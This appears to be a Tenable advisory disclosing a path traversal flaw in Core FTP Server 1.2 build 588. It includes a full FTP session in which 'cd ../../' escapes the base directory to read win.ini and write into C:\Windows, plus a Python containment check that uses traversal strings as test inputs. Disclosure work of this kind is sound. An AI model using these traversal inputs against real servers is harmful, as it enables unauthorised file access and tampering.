
[R1] Core FTP Server Path Traversal Arbitrary File/Directory Access

Medium

Synopsis

Configuration

Core FTP Server 1.2 build 588 (32 bit or 64 bit), released on April 7, 2016, was installed. This finding is based on setting the “domain properties” via the GUI so that the “Base directory” is C:\Users\Public and the authentication method “Enable WinNT users” is checked. The “Enable WinNT” authentication method allows the remote user to log in as one of the existing Windows users. No other major settings have been altered. On the server where Core FTP Server is installed, there is a native Windows administrative user we added, cleverly named “admin”.

A Case of Documentation?

The documentation for Core FTP Server is fairly minimal, enough to get it configured and working. However, the "Enable WinNT users" functionality (the little check box is visible in the second image at http://www.coreftp.com/server/help/Create_Domain.htm) doesn't come with any warning or explanation as to what that means, other than the context of using the native Windows accounts for authentication. Historically, FTP servers set a 'base directory' much like web servers set 'docroot', with the intention of that location being the highest point in the directory tree one could access. Historical traversal attacks would bypass that limitation, allowing access to files and/or directories elsewhere on the system. Based on the relevant documentation:

   http://www.coreftp.com/server/help/help_/GettingStarted.htm
   5:  Chose a base directory where all directories and user directories will exist.
   If you are choosing a networked drive, you may need to modify the account in the Core FTP Server's service properties, as the system account may not have access to the network drive.

   http://www.coreftp.com/server/help/Add_account.htm
   As a reminder, if you lock a user in their home directory, they will not be able to access virtual paths.

However, locking a user in the home directory doesn't work with NT Auth. Based on the above, an administrator installing Core FTP may expect that it should limit users to the configured Base Directory and subdirectories only.

Relative Path Traversal

Logging in as "admin" to the target machine when 'Enable WinNT users' is configured, Core FTP Server should probably restrict any user to C:\Users\Public and its subdirectories. However, using a simple traversal (e.g. ../../) via the 'cd' command, an attacker can traverse directories to see “C:\”, download files (e.g. win.ini from C:\Windows), and create files (e.g. “albino_lobster.txt” to C:\Windows):


madagascar:~ tenrec$ ftp [email protected]
Connected to 192.168.1.3.
220-Core FTP Server Version 1.2, build 588, 64-bit, installed 0 days ago Unregistered
220-Hello Friend
220 
331 password required for admin
Password: 
230-Logged on
230 
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,224).
150 Opening ASCII mode data connection
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Capybara
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Downloads
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Music
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Pictures
dr-xr-xr-x   1 owner    group               0 Nov 21  2010 Recorded TV
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Warez
226 Transfer Complete
ftp> cd ../../
250 CWD command successful
ftp> pwd
Remote directory: /
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,227).
150 Opening ASCII mode data connection
dr-xr-xrwx   1 owner    group               0 Apr  4 12:39 cygwin65
dr-xr-xr-x   1 owner    group               0 Apr 18 10:30 Program Files
dr-xr-xr-x   1 owner    group               0 Apr 18 13:54 Program Files (x86)
dr-xr-xrwx   1 owner    group               0 Apr 18 10:29 Python9000
dr-xr-xr-x   1 owner    group               0 Apr 18 14:59 Users
dr-xr-xrwx   1 owner    group               0 Apr 18 16:58 Windows
226 Transfer Complete
ftp> cd Windows
250 CWD command successful
ftp> get win.ini
local: win.ini remote: win.ini
227 Entering Passive Mode (192,168,1,3,237,248).
150 RETR command started
   403        2.88 MiB/s 
226 Transfer Complete
403 bytes received in 00:00 (1.32 MiB/s)
ftp> put albino_lobster.txt 
local: albino_lobster.txt remote: albino_lobster.txt
227 Entering Passive Mode (192,168,1,3,238,4).
150 STOR command started
100% |********************************************************************************************************|     4        2.00 KiB/s    00:00 ETA
226 Transfer Complete
4 bytes sent in 00:00 (1.52 KiB/s)

Note that if you log in as a non-administrator, you cannot write to C:\Windows.
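The root cause above is a base directory that is used only to build the real path, never to check it. As an added example (not Core FTP Server's code), the function below mirrors that naive mapping and then shows the containment check a server can apply to every CWD/LIST/RETR/STOR target before touching the filesystem; the base directory and request strings are taken from the transcript above.

```python
import ntpath  # Windows path semantics, so this runs on any host

BASE_DIR = r"C:\Users\Public"  # the "Base directory" from the domain properties


def naive_resolve(base_dir: str, cwd: str, requested: str) -> str:
    """Map an FTP path (virtual '/'-rooted cwd plus client argument) onto the
    filesystem by concatenation and let normpath collapse '..'.  This is the
    behaviour the transcript shows: 'cd ../../' from the base lands on C:\\."""
    virtual = requested if requested.startswith("/") else f"{cwd.rstrip('/')}/{requested}"
    return ntpath.normpath(ntpath.join(base_dir, virtual.lstrip("/")))


def is_within(base_dir: str, real_path: str) -> bool:
    """True only if real_path is base_dir itself or lies beneath it.
    The trailing separator stops 'C:\\Users\\PublicDocs' from matching
    'C:\\Users\\Public' by string prefix alone."""
    base = ntpath.normcase(ntpath.normpath(base_dir)).rstrip("\\") + "\\"
    target = ntpath.normcase(ntpath.normpath(real_path)).rstrip("\\") + "\\"
    return target.startswith(base)


def contained_resolve(base_dir: str, cwd: str, requested: str) -> str:
    """Same mapping as naive_resolve, but refuse anything that escapes base_dir.
    A server should run this on the final, normalised real path, after every
    '..' has been collapsed, not on the raw client string."""
    real = naive_resolve(base_dir, cwd, requested)
    if not is_within(base_dir, real):
        raise PermissionError(f"{requested!r} resolves to {real}, outside {base_dir}")
    return real


if __name__ == "__main__":
    for cmd in ("Capybara", "../../", "../../Windows/win.ini", "../PublicDocs"):
        try:
            print(f"{cmd:24} -> allowed: {contained_resolve(BASE_DIR, '/', cmd)}")
        except PermissionError as err:
            print(f"{cmd:24} -> denied:  {err}")
```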

Solution

Upgrade to Core FTP Server 1.2, build 589 to resolve this issue. Note that the Build 588 forum post was edited by Core FTP to mention 589, thus appearing to be backdated.

Tenable would like to acknowledge not only the quick response time in emails, but the incredibly fast turnaround on providing a new build to resolve this issue. Outstanding work.

Disclosure Timeline

2016-04-18 - Issue discovered
2016-04-29 - Reported to vendor via [email protected]
2016-04-29 - Vendor acks issue, working on patch
2016-04-29 - Vendor replies, Build 589 released to address issue
2016-05-02 - Tenable confirms updated build fixes issue

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2016-13
Credit: Jacob Baines, Tenable Network Security
CVSSv2 Base / Temporal Score: 5.5 / 4.5
CVSSv2 Vector: (AV:N/AC:L/Au:S/C:P/I:P/A:N/E:F/RL:OF/RC:C)
Affected Products: Core FTP Server 1.2, build 588
Risk Factor: Medium

Advisory Timeline

2016-05-03 - [R1] Initial Release
